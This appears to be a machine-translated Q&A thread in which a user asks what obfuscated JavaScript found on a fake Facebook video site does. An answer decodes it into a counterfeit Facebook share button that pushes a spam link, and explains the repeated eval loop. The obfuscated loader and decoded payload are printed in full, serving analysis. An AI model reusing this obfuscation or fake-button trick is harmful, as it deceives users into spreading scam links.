一位朋友刚刚在facebook冒名顶替网站上分享了一个视频链接。查看源代码我发现了以下有趣的Javascript代码段:
<script type="text/javascript">
//<![CDATA[
<!--
var x="function f(x){var i,o=\"\",l=x.length;for(i=0;i<l;i+=2) {if(i+1<l)o+=" +
"x.charAt(i+1);try{o+=x.charAt(i);}catch(e){}}return o;}f(\"ufcnitnof x({)av" +
" r,i=o\\\"\\\"o,=l.xelgnhtl,o=;lhwli(e.xhcraoCedtAl(1/)3=!84{)rt{y+xx=l;=+;" +
"lc}tahce({)}}of(r=i-l;1>i0=i;--{)+ox=c.ahAr(t)i};erutnro s.buts(r,0lo;)f}\\" +
"\"(5)12\\\\,P\\\"RZEA3X02\\\\\\\\\\\\r7\\\\00\\\\\\\\]M)^97gs5400\\\\\\\\3*" +
"01\\\\\\\\kv7v01\\\\\\\\)iz w|#8 -/-=}v4ptWzYJLU01\\\\0\\\\\\\\\\\\\\\\N\\\\"+
"B^XT@V13\\\\0^\\\\G@EYEXnY\\\\\\\\3{03\\\\\\\\H@VZ0R00\\\\\\\\wi y:;8967452" +
"301Ra77\\\\1P\\\\4+T+2<4523:006\\\\00\\\\03\\\\\\\\30\\\\05\\\\02\\\\\\\\23" +
"\\\\0T\\\\02\\\\0L\\\\35\\\\06\\\\02\\\\\\\\33\\\\07\\\\03\\\\\\\\20\\\\0K\\"+
"\\\\\\t6\\\\01\\\\\\\\02\\\\05\\\\03\\\\\\\\37\\\\02\\\\00\\\\\\\\16\\\\0R\\"+
"\\]X22\\\\03\\\\00\\\\\\\\01\\\\07\\\\01\\\\\\\\QY/Z)1>g,.847%i5><;9>';#5h0" +
"2\\\\\\\\\\\\u\\\\\\\"*\\\\0<b04c03\\\\\\\\WIcYI^TV4T02\\\\\\\\ti\\\\\\\\[W" +
"21\\\\0F\\\\JF21\\\\0B\\\\Xw0u01\\\\\\\\zIxW03\\\\04\\\\03\\\\\\\\IW1{<!8%(" +
"EJ5f(vv7c17\\\\\\\\.mP/cm&n0uC1-vol35\\\\0S\\\\16\\\\06\\\\01\\\\\\\\35\\\\" +
"04\\\\02\\\\\\\\21\\\\0Y\\\\37\\\\0Z\\\\I[02\\\\05\\\\00\\\\\\\\04\\\\07\\\\"+
"00\\\\\\\\1L0Q01\\\\\\\\30\\\\02\\\\03\\\\\\\\0H00\\\\\\\\13\\\\04\\\\01\\\\"+
"\\\\CX\\\\\\\\\\\\\\\\17\\\\01\\\\00\\\\\\\\-/`rxe05\\\\0c\\\\7oa7aejr!=#!j" +
"(0r~7~t8&3(22\\\\0J\\\\SS2]03\\\\\\\\02\\\\0\\\\\\\\\\\\\\\\[\\\\WY16\\\\0G" +
"\\\\VZJY0Y00\\\\\\\\EXOE10\\\\04\\\\03\\\\\\\\L@FV4Q01\\\\\\\\qS77\\\\1n\\\\"+
"7<z{cqcsvx1Zc<doJ~p0nddk.bov0o03\\\\\\\\ _7F03\\\\\\\\25\\\\01\\\\00\\\\\\\\"+
"03\\\\05\\\\00\\\\\\\\VU6/00\\\\\\\\\\\\t5\\\\02\\\\\\\\1;03\\\\03\\\\00\\\\"+
"\\\\37\\\\06\\\\03\\\\\\\\34\\\\0*\\\\23\\\\05\\\\00\\\\\\\\00\\\\0n\\\\\\\\"+
"\\\\\\\\rr\\\\\\\\\\\\\\\"\\\\\\\\\\\\\\\"\\\\\\\\\\\\31\\\\0|\\\\01\\\\0a\\"+
"\\)(48v45;!#pmno\\\\m\\\\\\\"7\\\\02\\\\\\\\5802\\\\\\\\yh1d03\\\\\\\\/(,#2" +
"3\\\\0`\\\\RPOH{OTL[S\\\\Z\\\\\\\\q\\\\vs17\\\\0@\\\\XB__\\\\k\\\\\\\\D\\\\" +
"KCLJca=f Bhou{7{I4a/ewf~}a1,fxu{fs_&d?7l00\\\\\\\\\\\\t7\\\\01\\\\\\\\X[C%Q" +
"^32\\\\02\\\\03\\\\\\\\^T7V03\\\\\\\\01\\\\0I\\\\\\\\A\\\\\\\\X\\\\YFV^BJ\\" +
"\\t4\\\\01\\\\\\\\20\\\\01\\\\02\\\\\\\\0?9;-5u}77\\\\1'\\\\h%!7j!\\\\ \\\\" +
"\\\"/\\\\ck%&f**>!'5&/oZZJT[O\\\\\\\\\\\\\\\\PJ]S5@03\\\\\\\\FE0G00\\\\\\\\" +
"01\\\\07\\\\02\\\\\\\\\\\\\\\\\\\\\\\\^_5A02\\\\\\\\0R00\\\\\\\\blK|5G03\\\\"+
"\\\\rz7|17\\\\\\\\vth&77\\\\1f\\\\f;`vxp!|77\\\\1i\\\\ky{ak(gji-on34\\\\00\\"+
"\\03\\\\\\\\37\\\\02\\\\03\\\\\\\\34\\\\0W\\\\17\\\\00\\\\00\\\\\\\\01\\\\0" +
"Z\\\\I[02\\\\05\\\\00\\\\\\\\04\\\\07\\\\00\\\\\\\\EI5^00\\\\\\\\17\\\\01\\" +
"\\03\\\\\\\\07\\\\00\\\\02\\\\\\\\^F6C00\\\\\\\\14\\\\06\\\\01\\\\\\\\16\\\\"+
"0x\\\\`~\\\\|\\\\\\\";\\\\(5?$z1>6$(`<kd#=7-02\\\\\\\\\\\"\\\\\\\\\\\\*5 (i" +
"ev$7G17\\\\\\\\UHT_[]AsTQ34\\\\0E\\\\J^XCDO2N02\\\\\\\\01\\\\07\\\\01\\\\\\" +
"\\HCPKDV=G Bxwusy{5yrzbb-,c&n``~pzq(fjto1c02\\\\\\\\31\\\\0\\\\\\\\(\\\"}fo" +
";n uret}r);+)y+^(i)t(eAodrCha.c(xdeCoarChomfrg.intr=So+7;12%={y+)i+l;i<0;i=" +
"r(foh;gten.l=x,l\\\"\\\\\\\"\\\\o=i,r va){,y(x fontincfu)\\\"\")" ;
while(x=eval(x));
看起来它将“badc”变成了“abcd”,然后再次进行了躲避。
是否有一位Javascript专家可以看到最终会出现什么样的讨厌?
答案 0 :(得分:6)
document.writeln("<span onclick=\"getsome();document.getElementById('close_div').style.display = 'none'; wopen2('http://www.facebook.com/sharer/sharer.php?locale=fi_FI&u=http://www.thegreatvideo.weebly.com/&src=sp','video_prom',160,30,'no','no');\" style=\"cursor: pointer;\" class=\"FBConnectButton FBConnectButton_Small\"> \r\n <span class=\"FBConnectButton_Text\" style=\"font-family:Arial, Helvetica, sans-serif; font-weight:bold; font-size:18px; color:#365ba8;\"></span> <img src=\"http://i.imgur.com/uG46r.gif\" border=\"0\"> </div> \r\n \r\n<div id=\"close_div\" style=\"position:absolute;top:0;left:0;display:block;z-index:100004;\"> \r\n <div style=\"position:relative;width:165px;height:25px;\"> \r\n</div></div>");0;
现在这基本上会将你转发给某种类似facebook的按钮。
<span
onclick="getsome();document.getElementById('close_div').style.display = 'none'; wopen2('http://www.facebook.com/sharer/sharer.php?locale=fi_FI&u=http://www.thegreatvideo.weebly.com/&src=sp','video_prom',160,30,'no','no');\"
style=\"cursor: pointer;\"
class=\"FBConnectButton FBConnectButton_Small\"
>
\r\n
<span
class=\"FBConnectButton_Text\"
style=\"font-family:Arial, Helvetica, sans-serif; font-weight:bold; font-size:18px; color:#365ba8;\"
></span>
<img
src=\"http://i.imgur.com/uG46r.gif\"
border=\"0\"
>
</div>
\r\n \r\n
<div
id=\"close_div\"
style=\"position:absolute;top:0;left:0;display:block;z-index:100004;\"
>
\r\n
<div
style=\"position:relative;width:165px;height:25px;\"
>
\r\n
</div>
</div>
神奇:
while(x=eval(x));
它包装严重。在获得实际代码之前,必须重新评估代码字符串3次。所以它基本上是自修改源代码。我假设一个自动程序被用来创建一个可以被证明可以提供“恶意”代码的变量。然后多次调用。